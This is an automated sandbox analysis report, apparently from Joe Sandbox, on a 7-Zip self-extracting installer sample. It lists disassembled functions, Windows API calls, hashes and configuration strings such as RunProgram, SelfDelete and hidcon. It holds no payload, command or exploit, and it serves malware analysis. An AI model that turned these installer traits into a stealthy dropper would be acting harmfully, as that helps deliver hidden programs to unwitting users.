??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253

Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50

Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64

??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F

Strings

HelpText, xrefs: 00406279
7zSfxString%d, xrefs: 00405D24
FinishMessage, xrefs: 00406C73
setup.exe, xrefs: 004066C9, 004066CE, 00406729
Shortcut, xrefs: 00406C04
SelfDelete, xrefs: 00405F14, 00406CD9
MiscFlags, xrefs: 00405ED4
sfxwaitall, xrefs: 004058A1
BeginPrompt, xrefs: 0040638E
7-Zip SFX, xrefs: 00406D53
i386, xrefs: 004068D8
InstallPath, xrefs: 004062FC
waitall, xrefs: 00406742
ExecuteFile, xrefs: 0040637E, 00406476, 00406484
sfxconfig, xrefs: 00405A8A, 00405C55
shc, xrefs: 00406881
bpt, xrefs: 00405F7C
GUIMode, xrefs: 00405E8E
GUIFlags, xrefs: 00405EB1
x86, xrefs: 004068C5
hidcon, xrefs: 004067E7
RunProgram, xrefs: 00406383, 0040649A, 004064A8
x64, xrefs: 004068FE
sfxversion, xrefs: 0040585C
ExecuteParameters, xrefs: 00406964
nowait, xrefs: 00406805
amd64, xrefs: 004068EB
OverwriteMode, xrefs: 00405E4A
BeginPromptTimeout, xrefs: 00405F95, 00406325
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00406D58
sfxelevation, xrefs: 004058BD, 0040606A
del, xrefs: 004068A1
AutoInstall, xrefs: 004063F0, 0040644B, 004067B0
SetEnvironment, xrefs: 004061A1, 004061A9, 0040623A
" -, xrefs: 0040606F
forcenowait, xrefs: 00406829
7ZipSfx.%03x, xrefs: 0040656E
Delete, xrefs: 00406C2C

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
API String ID: 1141480454-1804565692
Opcode ID: 87819c94549aa18a8e8ef10bcba38e1e2a7af6f0a2d96b9e4b0e9c3f6e960d4f
Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
Opcode Fuzzy Hash: 87819c94549aa18a8e8ef10bcba38e1e2a7af6f0a2d96b9e4b0e9c3f6e960d4f
Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

Function 00401815 Relevance: 22.8, APIs: 15, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7541b2c11181257edd47eb337f9d0a587ee31e8321364e0b5123e76872bdeec
Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
Opcode Fuzzy Hash: c7541b2c11181257edd47eb337f9d0a587ee31e8321364e0b5123e76872bdeec
Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

Function 0040236F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
GetProcAddress.KERNEL32(00000000), ref: 00402386
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394

Strings

kernel32, xrefs: 0040237A
GetNativeSystemInfo, xrefs: 00402375

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: AddressInfoLibraryLoadNativeProcSystem
String ID: GetNativeSystemInfo$kernel32
API String ID: 2103483237-3846845290
Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

Function 00403387 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
SetLastError.KERNEL32(00000010), ref: 004033AA

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D

Function 004011D1 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
SendMessageW.USER32(00008001,00000000,?), ref: 00401246

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

Function 00404F67 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00404F8B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
ShellExecuteExW.SHELL32(?), ref: 0040500A
WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
CloseHandle.KERNEL32(00406A69), ref: 0040502B
??3@YAXPAX@Z.MSVCRT(?), ref: 00405032

Strings

$gA, xrefs: 00404FBE

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
String ID: $gA
API String ID: 2700081640-3949116232
Opcode ID: 81019d8960a7ab839e71675d42f18ecb31e4f98237fe87bbfaf5e67c6ffd1eb4
Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
Opcode Fuzzy Hash: 81019d8960a7ab839e71675d42f18ecb31e4f98237fe87bbfaf5e67c6ffd1eb4
Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

Function 00401D21 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
DispatchMessageW.USER32(?), ref: 00401D73
KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83

Strings

Static, xrefs: 00401D44

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
String ID: Static
API String ID: 2479445380-2272013587
Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

Function 004036F1 Relevance: 10.6, APIs: 7, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
String ID:
API String ID: 846840743-0
Opcode ID: 44ccc78e6b35b3404b31794eba43600d3e63f6a28556bb8e765a0a445c807f12
Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
Opcode Fuzzy Hash: 44ccc78e6b35b3404b31794eba43600d3e63f6a28556bb8e765a0a445c807f12
Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

Function 0040F227 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040F230
??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1

Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E

Strings

{D@, xrefs: 0040F290, 0040F2A7
pmA, xrefs: 0040F2EB

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@$H_prolog
String ID: pmA${D@
API String ID: 3431946709-901781089
Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

Function 00401B75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4

Strings

k7@, xrefs: 00401B78

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID: k7@
API String ID: 635176117-1561861239
Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

Function 0040E9EF Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4

Strings

{D@, xrefs: 0040ED6C, 0040EED8
DmA, xrefs: 0040EA31

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@
String ID: DmA${D@
API String ID: 1033339047-1777112864
Opcode ID: 74c9a902782fff8892ef430172d3eabf3bdf310a24e7e9e2568896a4ddffddf4
Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
Opcode Fuzzy Hash: 74c9a902782fff8892ef430172d3eabf3bdf310a24e7e9e2568896a4ddffddf4
Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

Function 00410CCB Relevance: 7.6, APIs: 5, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@memcpymemmove
String ID:
API String ID: 3549172513-0
Opcode ID: 8619cfb4006b12d67c02153b720c73a7f55ec6f7673dbbb61edd29a6b56e383a
Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
Opcode Fuzzy Hash: 8619cfb4006b12d67c02153b720c73a7f55ec6f7673dbbb61edd29a6b56e383a
Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

Function 00404903 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F

Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B

Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
Part of subcall function 00402187: lstrcmpiW.KERNEL32(025649B0,00404926), ref: 0040224B
Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(025649B0), ref: 0040225B
Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303

Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,025649B0,00000002), ref: 00402334

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
wsprintfW.USER32 ref: 004049B0

Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Strings

7zSfxFolder%02d, xrefs: 004049AA

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d
API String ID: 3387708999-2820892521
Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

Function 00402BEE Relevance: 6.4, APIs: 5, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: lstrlenmemcmp$memmove
String ID:
API String ID: 3251180759-0
Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

Function 00401611 Relevance: 6.1, APIs: 4, Instructions: 100
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676

Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
